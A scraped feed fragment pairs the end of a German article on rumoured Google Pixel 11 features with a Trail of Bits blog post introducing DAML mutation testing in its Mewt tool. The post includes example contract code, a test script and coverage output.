				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Dominik Tomaszewski / Foundry</p></div>



<p>Durch die vollständige Verlagerung dieses Prozesses auf das Gerät könnte die Pixel-11-Serie ihren Nutzern die Möglichkeit bieten, hellere und klarere Videos bei schlechten Lichtverhältnissen aufzunehmen, ohne dass eine Internetverbindung erforderlich ist.</p>



<p>Obwohl konkrete Angaben zu den Objektiven dieser neuen Smartphones noch rar sind, scheint es nun wahrscheinlich, dass das Pixel 11 und das Pixel 11 Pro Fold über ein völlig neues 50-Megapixel-Hauptobjektiv verfügen werden, während das 11 Pro und das 11 Pro XL ein anderes, aber ebenfalls neues 50-Megapixel-Hauptobjektiv sowie ein verbessertes Teleobjektiv gemeinsam nutzen werden.</p>



<p>Sollten sich diese Gerüchte bestätigen, könnte die Kameraausstattung insgesamt einen deutlichen Qualitätssprung verzeichnen, was den neuen Pixel-Modellen sicherlich dabei helfen würde, sich von den aktuellen Kamera-Favoriten von Oppo, Vivo und Xiaomi abzuheben.</p>



<h3 class="wp-block-heading">Pixel 11: Funktionen, darunter „Pixel Glow“</h3>



<p>Eine wachsende Flut von <a href="https://9to5google.com/2026/04/16/pixel-glow-laptop/" target="_blank" rel="noreferrer noopener">Gerüchten</a> deutet darauf hin, dass Google eine eigene Version der „Glyph“-Leuchten von Nothing einführen will, bekannt als „Pixel Glow“. Da uns die bereits erwähnten Renderings vorliegen, ist natürlich klar, dass das Konzept nicht genau dieselbe Designphilosophie verfolgen wird, die bei den Nothing-Smartphones eher weitläufig umgesetzt ist, sondern vielmehr die Idee, bestimmte Benachrichtigungen durch Lichter anzuzeigen, wenn das Smartphone mit der Vorderseite nach unten liegt.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4ba684"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/03/PXL_20250310_111828487.jpg?quality=50&amp;strip=all&amp;w=1200" alt="PXL 20250310 111828487" class="wp-image-2632982" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Mattias Inghe</p></div>



<p>Die Existenz einer solchen Funktion wurde in einer Beta-Version von Android 17 entdeckt, wobei in den begleitenden Hinweisen erläutert wird, dass die Funktion „durch dezente Licht- und Farbsignale auf der Rückseite Ihres Geräts Sie über wichtige Aktivitäten informiert“. Es ist anzunehmen, dass sich „Pixel Glow“ – basierend auf dem, was wir vom Design des Pixel 11 gesehen haben – entweder auf den Blitzbereich des leicht überarbeiteten Kameraausstellers oder auf das Google-„G“-Logo in der Mitte beschränken wird; wir tippen jedoch auf Ersteres, da in den Hinweisen auch erwähnt wird, dass aktivierte Blitzbenachrichtigungen „Pixel Glow“ vollständig außer Kraft setzen.</p>



<p>Es ist auf jeden Fall eine coole Funktion, da sie manchen Menschen helfen könnte, einen gesünderen Umgang mit ihrem Smartphone zu pflegen. Genau wie bei den „Nothing Glyphs“ sollen diese lichtbasierten Benachrichtigungen Sie nur auf wirklich wichtige Angelegenheiten aufmerksam machen, sodass Sie weniger dazu neigen, sofort durch Ihr Smartphone zu scrollen, sobald eine Benachrichtigung auf dem Bildschirm erscheint.</p>



<p>Da die Funktion mehrfarbige Lichter nutzen wird, ist davon auszugehen, dass Sie bestimmte Benachrichtigungen farblich kennzeichnen können, sodass Sie auf einen Blick genau erkennen, was das Smartphone Ihnen mitteilen möchte – sei es ein eingehender Anruf oder eine Lieferbenachrichtigung.</p>



<p>Google scheint von den Fähigkeiten von „Pixel Glow“ ziemlich überzeugt zu sein, da die Beta-Version auch darauf hindeutet, dass das Konzept in einem kommenden Laptop zum Einsatz kommen wird. Seitdem wurden <a href="https://blog.google/products-and-platforms/platforms/android/meet-googlebook/" target="_blank" rel="noreferrer noopener">Googlebooks mit einer „Glowbar“ angekündigt</a>, was uns eine Art Vorschau darauf gibt, wie dies beim Pixel 11 aussehen könnte.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4baba8"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/05/Pixel-11-teaser-Glow.jpeg?quality=50&amp;strip=all&amp;w=1200" alt="" class="wp-image-3145379" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Google</p></div>



<p>Ein kleiner Vorgeschmack darauf, wie die Idee aussehen könnte, war im Rahmen der Google I/O 2026 zu sehen, wo wir ganz kurz einen Lichtring um ein Pixel 10 Pro XL erkennen konnten. Es ist bestenfalls flüchtig, wirkt aber wie ein möglicher Vorgeschmack von Google darauf, was uns erwartet – auch wenn es Teil eines KI-Abschnitts war, in dem nicht viel real war.</p>



<p>Wir haben Gemini gebeten, ein Konzeptbild für „Pixel Glow“ zu erstellen, und die Ergebnisse sind recht interessant. Nach mehreren Eingabeaufforderungen gelang es uns, Googles charakteristische Farben um die Kameraleiste herum erscheinen zu lassen, und obwohl es sich nach wie vor nur um eine Visualisierung einer möglichen Zukunft handelt, spricht definitiv einiges dafür, dass dies der Rückseite des Smartphones ein zusätzliches Flair verleiht.</p>



<p>Eine andere Möglichkeit wäre, dass es Teil des „G“-Logos ist, doch wir halten dies für weniger wahrscheinlich.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4bb05e"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/05/Pixel-11-with-camera-bar-Pixel-Glow-lights-by-Gemini.png?w=805" alt="Pixel 11 with camera bar Pixel Glow lights by Gemini" class="wp-image-3137669" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Chris Martin / Foundry</p></div>



<p>Obwohl die Pixel-11-Reihe von „Pixel Glow“ profitieren soll, scheint es, als wolle Google im Gegenzug etwas weglassen, nämlich den Temperatursensor. Der Temperatursensor, der ursprünglich bereits beim <a href="https://www.pcwelt.de/article/2103410/google-pixel-8-pro-test.html" target="_blank" rel="noreferrer noopener">Pixel 8 Pro</a> eingeführt wurde, wirkte oft wie ein unausgereiftes Konzept, zumal es zum Zeitpunkt der Markteinführung keinen offensichtlichen Nutzen gab und der Eindruck entstand, dass die Technologie auf Drittanbieter angewiesen war, um ihre Existenz zu rechtfertigen. Daher stört es uns nicht sonderlich, dass er entfernt wird.</p>



<p>Schade ist jedoch, dass nach Gerüchten, wonach ein vollwertiges Äquivalent zu Apples Face ID in der Entwicklung sei und in der Pixel-11-Reihe sein Debüt feiern sollte, nun offenbar feststeht, dass diese Technologie den Markteintritt komplett verpassen und wahrscheinlich erst in den Modellen des nächsten Jahres zum Einsatz kommen wird.</p>



<p>Das Fehlen einer vollwertigen Gesichtserkennung wird die neuen Pixel-Modelle, insbesondere die höherpreisigen, gegenüber bestimmten Android-Geräten wie dem <a href="https://www.pcwelt.de/article/3041397/honor-magic-8-pro-test.html" target="_blank" rel="noreferrer noopener">Honor Magic 8 Pro</a> benachteiligen, das über einen frontseitigen 3D-Scanner verfügt, der Apples „Dynamic Island“ durchaus ähnelt.</p>



<h3 class="wp-block-heading">Pixel 11: Akku &amp; Aufladen</h3>



<p>Zwar wurden die Akku-Spezifikationen für die Pixel-11-Serie noch nicht bekannt gegeben, doch gibt es einen interessanten Hinweis, der bereits in die Gerüchteküche gelangt ist: die Möglichkeit eines austauschbaren Akkus.</p>



<p>Vor allem dank Apple und dessen Beharren auf einem einheitlichen Gehäuse haben so gut wie alle Hersteller das Konzept der austauschbaren Akkus aufgegeben, obwohl diese Funktion einst ein fester Bestandteil von Mobiltelefonen im Allgemeinen war. Einem kürzlich veröffentlichten <a href="https://hypertxt.ai/blog-images/Google-Pixel-Removable-Battery.pdf" target="_blank" rel="noreferrer noopener">Patent </a>zufolge scheint es jedoch, als würde Google darüber nachdenken, dieses Konzept wieder aufzugreifen – möglicherweise für das Pixel 11 Fold.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4bb561"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/01/Pixel-11-Pro-Fold-Battery-Patent.png?w=1200" alt="Pixel 11 Pro Fold Removable Battery Patent" class="wp-image-3037196" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">US Patent</p></div>



<p>Da die faltbaren Pixel-Smartphones deutlich mehr Energie benötigen, um ihre größeren internen Bildschirme mit Strom zu versorgen, könnte ein schnell austauschbarer Akku für intensive Nutzer eine echte Rettung sein. Es lässt sich nicht sagen, ob Google diese Funktion auch für andere Modelle der Pixel-11-Reihe in Betracht zieht, doch wir würden uns sehr darüber freuen – insbesondere, da dies die Smartphones angesichts der nachlassenden Akkuleistung zu einer weitaus praktikableren Langzeitlösung machen würde.</p>



<p>Google könnte zudem schnellere Ladezeiten einführen und die Akkulaufzeit verbessern, um den Anforderungen der verbesserten Hardware und der KI-Funktionen gerecht zu werden.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4bba15"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/08/Google-Pixelsnap-Charger.png?w=1200" alt="Google Pixelsnap charger" class="wp-image-2880960" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Google</p></div>



<p>Abgesehen von diesen Gerüchten besteht die größere Hoffnung, dass Google möglicherweise auch schnellere Ladezeiten einführt und die Akkulaufzeit insgesamt verbessert, um den Anforderungen der verbesserten Hardware und der KI-Funktionen gerecht zu werden.</p>



<p>Schließlich verfügt die Pixel-10-Serie über integriertes magnetisches Qi2-Laden – ähnlich wie Magsafe –, wobei das XL-Modell mit Qi2.2 eine kabellose Ladegeschwindigkeit von 25 Watt erreicht.</p>



<p>Hoffentlich werden alle Pixel-11-Smartphones den schnelleren Qi2.2-Standard sowie die kabelgebundene Ladegeschwindigkeit von 45 Watt des Pixel 10 Pro XL erhalten.</p>



<h3 class="wp-block-heading">Pixel 11: Software</h3>



<p>Es wird erwartet, dass das Software-Erlebnis der Pixel-11-Serie eng mit den neuesten KI-Entwicklungen von Google verzahnt sein wird und Funktionen bietet, die die alltägliche Interaktion mit dem Gerät vereinfachen und verbessern. Dank eines Berichts erfahren wir bereits einiges darüber.</p>



<p>Eine der erwarteten Software-Verbesserungen ist die Funktion „Speak-to-Tweak“, mit der Nutzer sprachgesteuerte Anpassungen an ihren Fotos vornehmen können. Durch das einfache Aussprechen von Befehlen können Nutzer Bildeinstellungen wie Helligkeit, Kontrast und Sättigung optimieren, wodurch die Bildbearbeitung intuitiver und zugänglicher wird.</p>



<p>Darüber hinaus könnte die Pixel-11-Serie über „Sketch-to-Image“ verfügen, ein Tool, das grobe Skizzen in detaillierte Bilder umwandelt, ähnlich wie bei Samsungs Galaxy AI. Diese Funktion dürfte besonders für kreative Nutzer nützlich sein, die aus einfachen Skizzen Kunstwerke oder visuelle Inhalte erstellen möchten.</p>



<p>Eine weitere Software-Innovation mit dem vorläufigen Namen „Magic Mirror“ soll sich Gerüchten zufolge in der Entwicklung befinden, wobei konkrete Details noch unklar sind. Diese Funktion könnte neue KI-basierte Anpassungsoptionen für Fotos oder Videos einführen und damit möglicherweise die Personalisierungs- oder Verschönerungsfunktionen innerhalb der Foto- und Videobearbeitungs-Apps des Geräts verbessern.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4bbf52"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/09/Google-Pixel-9-Pro-Fold-review-35.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Google Pixel 9 Pro Fold review 35" class="wp-image-2454270" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Luke Baker</p></div>



<p>Die Pixel-11-Serie könnte dank der im Tensor-G6-Chip integrierten nanoTPU-Technologie zudem mit einer Reihe von durchgehend aktiven Tools zur Gesundheitsüberwachung auf den Markt kommen. Diese Suite von ML-basierten Funktionen könnte die Erkennung von Schlafapnoe, Schnarchen und Husten sowie sogar die Sturzerkennung umfassen, was das Pixel 11 zu einem leistungsstarken Gerät für gesundheitsbewusste Nutzer macht.</p>



<p>Die Serie könnte zudem neue fitnessorientierte Funktionen wie „Running ML“ enthalten, das Läufern Echtzeit-Feedback liefert, darunter anpassbare Tempovorgaben und eine Gleichgewichtsanalyse, und den Nutzern so hilft, ihre Trainingsroutinen zu optimieren.</p>



<p>Zusätzlich zu diesen Neuerungen könnte das Pixel 11 die Unterstützung für Googles „Quick Phrases“ erweitern – eine Funktion, mit der Nutzer bestimmte Aktionen ausführen können, ohne den Google Assistant vollständig zu aktivieren.</p>



<p>Das Potenzial für verbesserte „Quick Phrases“ könnte alltägliche Aufgaben wie das Annehmen von Anrufen oder die Steuerung von Smart-Home-Geräten vereinfachen und die Smartphones der Pixel-11-Serie zu äußerst reaktionsschnellen Geräten machen, die sich nahtlos in den Alltag der Nutzer integrieren.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4e54c4bc43f"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/09/Google-Pixel-9-Pro_review_12.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Google Pixel 9 Pro review 12" class="wp-image-2457636" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Dominik Tomaszewski / Foundry</p></div>



<p>Wir wissen nun wesentlich mehr darüber, was Google mit <a href="https://www.pcwelt.de/article/2990238/android-17-release-features-update-2.html" target="_blank" rel="noreferrer noopener">Android 17</a> für das gesamte Ökosystem bereithält. Dazu gehören ein starker Fokus auf die Google-KI, die Aufgaben für Sie übernimmt, sowie Funktionen, die Ihr Wohlbefinden in den Vordergrund stellen, wie „Pause Point“. Smartphones von Google und Samsung werden als erste von der aktualisierten Software profitieren, sodass Fans davon ausgehen können, Android 17 mit der Pixel-11-Reihe direkt nach dem Auspacken nutzen zu können.</p>
</div></div>
<!-- @@AD gpt-leaderboardmainbod-4 PRE @@--><div class="ad page-ad has-ad-prefix ad-article" data-ad-template="article" data-ofp="false" data-aaad="true" data-aa-adunit="/8456/IDG.DE_B2C_PCWelt.de/feature_door" data-aa-targeting='{"pos":"BTF4"}'>
				</div><!-- @@AD gpt-leaderboardmainbod-4 POST @@--></div>



<hr class="wp-block-separator has-alpha-channel-opacity">



<p>Das ist alles, was wir bislang über die Pixel-11-Serie wissen, doch wir werden diesen Artikel bis zur Markteinführung fortlaufend aktualisieren, sobald neue Gerüchte und Leaks bekannt werden.</p>



<p></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mutation testing comes to DAML]]></title>
<description><![CDATA[In April we released Mewt, our open-source mutation-testing engine that finds the gaps in your test suite. Today we’re expanding it with support for DAML, the language Canton Network applications are written in. Mewt now reads DAML, generates several classes of mutants (including two built for DA...]]></description>
<link>https://tsecurity.de/de/3654082/it-security-nachrichten/mutation-testing-comes-to-daml/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654082/it-security-nachrichten/mutation-testing-comes-to-daml/</guid>
<pubDate>Wed, 08 Jul 2026 13:08:35 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>In April we released <a href="https://blog.trailofbits.com/2026/04/01/mutation-testing-for-the-agentic-era/">Mewt</a>, our open-source mutation-testing engine that finds the gaps in your test suite. Today we’re expanding it with support for DAML, the language Canton Network applications are written in. Mewt now reads DAML, generates several classes of mutants (including two built for DAML’s authorization primitives), and runs them through your existing test suite to count how many mutants survive. If you want to try it, simply install Mewt from the <a href="https://github.com/trailofbits/mewt">repository</a>, point a <code>mewt.toml</code> at your project and its test command, and use <code>mewt run</code>.</p>
<p>For a team shipping DAML to production, that count is what a passing test run is actually worth: it puts a number on how much your suite checks, whereas a green run on its own does not.</p>
<h2>Why DAML’s coverage reports lie</h2>
<p>Test coverage is the most reassuring lie in smart-contract development. Hitting 100% line coverage tells you the test runner walked the code; it does not tell you whether any test would fail if that code stopped doing what it is supposed to. We have been grading test harnesses by how many mutants they kill since at least <a href="https://blog.trailofbits.com/2019/01/23/fuzzing-an-api-with-deepstate-part-2/">2019</a>, and <a href="https://blog.trailofbits.com/2025/09/18/use-mutation-testing-to-find-the-bugs-your-tests-dont-catch/">our primer on finding the bugs your tests don’t catch</a> shows how a green suite can still miss the bug that matters.</p>
<p>DAML’s built-in coverage measures execution at the template and choice level: which templates were created and which choices were exercised over the test run. It reports whether each choice was exercised, not what happened inside it. A test that exercises a choice once and asserts nothing about the result reports that choice as covered. The report prints the same green percentage whether the test verifies the outcome or discards it.</p>
<h2>How mutation testing works</h2>
<p>Instead of asking whether your tests reached the code, mutation testing grades your tests by sabotaging that code. The engine generates mutants, copies of the code that each carry one small deliberate change: a flipped comparison, a removed branch, a dropped party. It then runs your test suite against each one. A mutant that makes the suite fail is caught; a mutant that passes every test survives. Every survivor is a change your tests let through, and each one is either harmless or a potential bug. The harmless ones are equivalent code no test could distinguish or a branch no execution reaches, and you can set those aside. The rest are a to-do list: each one is a specific test you are missing, a case your suite should check but does not, occasionally with a real bug sitting behind the gap. The primer above describes a real audit where a mutation campaign surfaced a high-severity bug that the project’s tests had missed.</p>
<h2>Mutation testing forces the unhappy path</h2>
<p>A DAML contract encodes rights and obligations between named parties: who holds what, who owes what to whom, and who must authorize each step. A party is not an anonymous address. It represents a real organization or person, and the contract is the rulebook for how those parties interact, including which of them can take which action, what each is allowed to see, and what stays private between them.</p>
<p>Authorization is how that rulebook is enforced: who may take which action. It is also easy to get wrong in ordinary ways, such as a typo in a controller clause, a missing party, an extra one left over from a refactor. Every combination type-checks, so nothing rejects it before it ships. A static analyzer can flag suspicious patterns, but it has no way to know which party should hold which authority on your contract. That knowledge lives in your specification, and for most projects, the only executable form of the specification is the test suite. Happy-path tests supply every signature the contract asks for and confirm the transaction succeeds. They never try the negative case—removing a required signature and checking that the ledger rejects the transaction—so they never actually test whether that signature was required at all. If the tests don’t encode that rule, nothing downstream can recover it. Mutation testing is what tells you whether they do.</p>
<p>A green test run tells you your tests passed today. Mutation testing asks the harder question: would your tests catch a mistake, now or after the next code change? Where the answer is no, you have found a test case worth writing.</p>
<h2>What Mewt adds for DAML</h2>
<p>Mewt parses every language it supports with a tree-sitter grammar. As of mid-2026, there is no maintained tree-sitter grammar for DAML, so we reused the upstream <code>tree-sitter-haskell</code> grammar. DAML is Haskell-shaped, but its contract constructs (<code>template</code>, <code>choice</code>, <code>controller</code>, and <code>signatory</code>) are not Haskell, and the grammar parses them as error-recovered subtrees. That matters less than it sounds. The common mutations still work on DAML’s ordinary expressions, so Mewt swaps arithmetic and comparison operators, flips Booleans, and removes branches just as it does in any other language, with only small adjustments where DAML’s surface syntax differs (DAML writes <code>/=</code> where most languages write <code>!=</code>). We got most of the value of a from-scratch grammar without building one.</p>
<p>The new engineering went into DAML’s authorization primitives, where the authorization bugs from the previous section live. Mewt adds two DAML-specific mutations:</p>
<ul>
<li>
<p><strong>Controller party swap</strong> (CPS in Mewt’s output): replace one party in a <code>controller</code> clause with another party that is in scope at that site.</p>
</li>
<li>
<p><strong>Controller party removal</strong> (CPR): drop one party from a multi-party controller list.</p>
</li>
</ul>
<p>Both target the same question: if the set of parties allowed to exercise this choice silently changed, would any test fail? They are a deliberately small starting set aimed at the bug class above, and more DAML-specific mutations are in the pipeline.</p>
<p>Driving a campaign needs no new harness. A short <code>mewt.toml</code> names the files to mutate and the test command (<code>dpm test</code> for a Daml 3 project), and <code>mewt run</code> does the rest, reporting each mutant as caught or surviving. The setup is deliberately small: trying it on your own project costs minutes, and we encourage exactly that.</p>
<h2>What a surviving mutant looks like</h2>
<p>Picture a conditional payment between a buyer and a seller: the buyer sets money aside for the goods, and paying it out to the seller requires both parties to sign off. The buyer’s signature is the delivery confirmation. In DAML, that policy is one line: the <code>controller</code> line on the <code>Release</code> choice.</p>
<figure class="highlight">
 <pre tabindex="0"><code class="language-" data-lang="">template ConditionalPayment
 with
 buyer : Party
 seller : Party
 amount : Decimal
 where
 signatory buyer
 observer seller

 choice Release : ()
 with
 paid : Decimal
 controller buyer, seller
 do
 assert (paid == amount)</code></pre>
 <figcaption><span>Figure 1: A payment that requires both the buyer and the seller to approve its release</span></figcaption>
</figure>
<p>A typical happy-path test creates the payment and has both parties approve the release. The <code>actAs buyer &lt;&gt; actAs seller</code> line submits the command with both parties’ authority:</p>
<figure class="highlight">
 <pre tabindex="0"><code class="language-" data-lang="">testHappyPath : Script ()
testHappyPath = script do
 buyer &lt;- allocateParty "Buyer"
 seller &lt;- allocateParty "Seller"
 payment &lt;- submit buyer do
 createCmd ConditionalPayment with
 buyer
 seller
 amount = 100.0
 submit (actAs buyer &lt;&gt; actAs seller) do
 exerciseCmd payment Release with paid = 100.0
 pure ()</code></pre>
 <figcaption><span>Figure 2: The happy-path test. It passes, and coverage reports 100%.</span></figcaption>
</figure>
<p>The test passes, and by the usual measure the suite looks complete: running <code>dpm test</code> with coverage reporting enabled shows full coverage.</p>
<figure class="highlight">
 <pre tabindex="0"><code class="language-" data-lang="">$ dpm test --show-coverage --coverage-ignore-choice Archive
testHappyPath: ok, 0 active contracts, 2 transactions.
- Internal templates: 1 defined, 1 (100.0%) created
- Internal template choices: 1 defined, 1 (100.0%) exercised</code></pre>
 <figcaption><span>Figure 3: The coverage report for the happy-path test. Every template is created and every choice is exercised, for 100% coverage.</span></figcaption>
</figure>
